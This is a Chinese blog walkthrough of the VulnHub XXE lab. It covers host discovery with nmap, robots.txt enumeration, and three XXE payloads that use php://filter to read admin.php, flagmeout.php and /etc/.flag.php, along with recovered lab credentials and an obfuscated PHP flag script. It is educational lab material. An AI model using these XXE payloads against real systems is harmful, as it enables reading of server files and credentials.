vulnhub之XXE靶机详解

已于 2023-03-20 19:20:18 修改
阅读量987 收藏 4
点赞数 2
分类专栏: 虚拟机&靶场 文章标签: php 服务器 java web安全
于 2023-03-20 19:17:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/129673186
版权
本文介绍了如何在Vulnhub环境中安装和利用XXE靶机进行安全测试。通过nmap探测主机,发现开放的80端口,进一步分析web站点,利用XXE漏洞获取敏感信息,包括用户密码和flag文件内容,涉及了base64编码和解码以及PHP代码解析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

vulnhub之XXE靶机详解

前言

拒绝水文,从我做起,如果如下教程有看不懂的,直接call小编哦

一、靶机安装

靶机下载地址:https: //download.vulnhub.com/xxe/XXE.zip

如上地址直接拿到浏览器上,就可以进行靶机下载,下载后的文件夹如下所示:

在这里插入图片描述

直接打开虚拟机:

在这里插入图片描述
在这里插入图片描述

最后使用虚拟机打开(打开的文件在新建虚拟机路劲下面)

二、信息收集阶段

1. 环境

  1. kali配置如下:
    • ip:192.168.93.131
  2. xxe靶机未知

2. 探测局域网主机

使用nmap进行主机探测,nmap 192.168.93.100-199(探测192.168.93.100到192.168.93.199之中的所有主机),探测结果如下:

在这里插入图片描述

由上图可以看出,主机1开放了80号端口,http协议端口开放,说明有web站点,访问192.168.93.132,结果如下所示:

在这里插入图片描述

3. 信息收集

对于一个以知道的站点,第一步肯定是扫描,扫描机器太多了,有御剑,AWVS,还可以使用burpsuit爬取网页结构等等,我直接说信息收集的结果:

发现robots.txt文件,地址http://192.168.93.132/robots.txt,具体结果如下:

在这里插入图片描述

三、解题

由上一步的信息收集我们可以知道,该网站有如下两个目录:
http://192.168.93.132/xxe/,http://192.168.93.132/xxe/admin.php,先进入http://192.168.93.132/xxe/,尝试登录并抓包:

在这里插入图片描述

POC如下所示:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进入重放模块,使用POC进行分析:

在这里插入图片描述

解码结果分析可得用户名和密码:administhebest、admin@123

在这里插入图片描述

进行登录http://192.168.93.132/xxe/admin.php,结果如下所示:
在这里插入图片描述
在这里插入图片描述

读取flagmeout.php文件的POC如下所示:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

在这里插入图片描述

base64解码结果如下所示:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5进行base32解码后再进行base64解码后的结果为/etc/.flag.php,然后读取/etc/.flag.php中的类容,POC如下所示:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

在这里插入图片描述

其中类容解码结果如下所示,直接PHP运行得到结果

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);

相关网站

base32解码
MD5解码

vulnhub——XXE练习
怪味巧克力的博客
04-22 666
今天写一个关于vulnhub上的关于XXE漏洞利用的一个靶场练习 0x01 首先肯定得先下载啊,这里我就不多说了,自己到vulnhub官网下载即可(百度搜官网),然后进去后搜索XXE,下载第一个。解压,安装,靶场布置完成。 0x02 首先我们发现,靶机开启以后是要登录,但是本题并没有给我们登录的账号和密码,所以,别想着去登录了(哈哈哈),那怎么办? 你可能会有疑问,我连靶场IP地址都不知道! 那...
Vulnhub-XXE靶场
hackerXxxt的博客
08-18 486
4.从抓取中的数据包可以看出admin.php是在xxe的目录下面,所以我们打开192.168.200.131/xxe/admin.php页面,将刚刚获取到的账号密码输入。2. 打开burp suite,抓取登录页面的数据包,可以看到XML的格式,这里就可以看出我们所要攻击的XXE漏洞了。(在线php的网站各有差异,我刚开始找的都没有显示出来,还以为是我的数据弄错了,后面试了很多个才找到可以运行出的)将读取到的数据发送到Decoder下,使用base64解密,可以得到账号和密码,密码用md5解密可以得到。
vulnhub-XXE靶机渗透
banacyo14206的博客
08-24 434
靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip XXE注入工具下载: https://download.csdn.net/download/weixin_41082546/11609927 CTFCrackTools解码工具: https://download.csdn.net/download/weixin_410825...
VulnHub-XXE通关攻略
最新发布
m0_66808441的博客
03-10 265
【代码】XXE靶机通关攻略。
Vulnhub-XXE靶机
djpcs2013的博客
06-10 520
1.主机发现 nmap -sS 192.168.74.1/24 就是192.168.74.158没错了,开放了80端口。 2.前期信息收集 访问192.168.74.158,就是apache默认页。 御剑扫目录。 访问robots.txt。存在/xxe/路径,admin.php。 ip/xxe为登录界面。 admin.php在/xxe/目录下。ip/xxe...
vulnhub-XXE
战神/calmness的博客
07-14 543
目录 信息探测:netdiscover ​访问80端口 存在XXE请求包信息 可以看到用户名密码是通过xml传递给后端的 查看用户名信息 /etc/passwd PHP伪协议 /xxe/admin.php /xxe/flagneout.php /etc/.flag.php PHPStudy 信息探测:netdiscover 访问80端口 存在XXE请求包信息 可以看到用户名密码是通过xml传递给后端的 查看用户名信息 /et...
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhubXXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
(vulhub靶机通关) XXE LAB: 1
yang1234567898的博客
01-16 2902
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
vulnhub-xxe靶场(XXE漏洞最细攻略)
2301_76631050的博客
07-25 937
看不懂,但是 是flag.php里的内容,猜测是php代码,用自己的网站查看,在自己得WWW目录下创建.php文件把内容粘贴到里面,不要忘记加
vulnhub打靶-XXE
m0_52920608的博客
07-18 316
vulnhub---xxe打靶
vulnhub靶机xxe
weixin_68416970的博客
06-15 1034
看不懂,应该是flag.php里的内容,猜测是php代码,于是放入在线的php环境或者自己的 网站查看。php解析器版本是php5才能正常解析出flag,版本过高都会显示不出flag。得到登录密码,因为是在admin.php的源码里于是访问admin.php网址。因为是xxe靶场,于是猜测登录是用xml数据传输,使用burp抓取登录包内容。访问本地xxe.php的源码,用base64格式输出,解码得。全是大写字母和数字,猜测是base32加密,再解密。并无发现,同样的方法查看admin.php
[内网渗透]XXE-vulnhub
leekos的博客,分享web安全相关知识~
07-20 450
其实这个xxe的靶场也不难,就一下常规步骤,之前没有写wp,以后要多总结,多写wp才能更好的复习。
渗透:vulnhub-XXE 靶机
m0_46412682的博客
09-13 1280
渗透:vulnhub-XXE 靶机 一、靶机下载 靶机XXE 下载地址: https://download.vulnhub.com/xxe/XXE.zip 二、装靶机 ①把下载好的压缩包解压到我自己的D盘:F:\虚拟机数据\XXE ②右键双击xxe.ovf-->打开方式-->VMware,存储在自己喜欢的位置 导入后,打开虚拟机 就这样,然后设置nat模式 我们这里的VM...
XXE靶机详解
like_niustyle的博客
09-14 727
常规思路:先扫描端口,扫描目录 这里有点迷惑了,我用nessus扫了一遍扫出来两个开放端口:80和5335,。但是用nmap只扫描出来了一个80 端口 不知道是什么原因,有懂的大佬可以解释一下 不管了,根据后面的结果来看端口多一个少一个完全不影响 照例访问80: 没啥用,apache默认页面 端口5335访问不了 接下来扫目录,御剑和dirb都可以,看用什么系统了 index.html依然是apache的默认界面 robots.txt: xxe是目录,admin.php是页面 xxe: xx
xxe靶机
shy的博客
01-15 428
开始之前先回忆一下nmap 一直都知道nmap功能很强大,但是平时工作中就只用来扫描端口,渐渐的都忘记了其它的功能及使用方法,正好今天做靶场需要用nmap进行存活主机发现,总结下nmap的使用方法。 场景一:主机发现 nmap -sP 192.168.44.0/24 使用ping命令来发现存活主机 场景二:端口扫描 nmap -v -sV -p- 192.168.44.138...
XXE靶机
weixin_71053667的博客
07-25 260
扫描目录我们首先要知道该网站下有哪些页面,然后在其中找有XXE的漏洞,通过御剑目录扫描来扫描目录。将发现的flagmeout.php放到xxe里找一下,右击查看源代码。指向/etc/passwd文件,发现没有。查看/var/www/html/xxe/index.php,也没有。复制后解码发现没用,继续查看admin.php。得到/etc/.flag.php,再次抓包。发送后放到php文件中运行,最终拿到。打开xxe/admin.php,在xxe界面,输入,发现回显点。点击flag,没有找到,
XXE -靶机
2201_75891821的博客
07-25 615
XXE靶机
Vulhub-php_xxe
Mccc_li的博客
04-16 912
test
XXE漏洞详解:从基础到危害
"XXE超详细讲解 全网仅此一份 - 学习XXE漏洞原理及危害" XXE(XML External Entity Injection)是一种针对XML解析器的漏洞,允许攻击者通过构造恶意的XML输入,注入外部实体,从而获取服务器上的敏感信息,执行系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三年之约-第二年

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值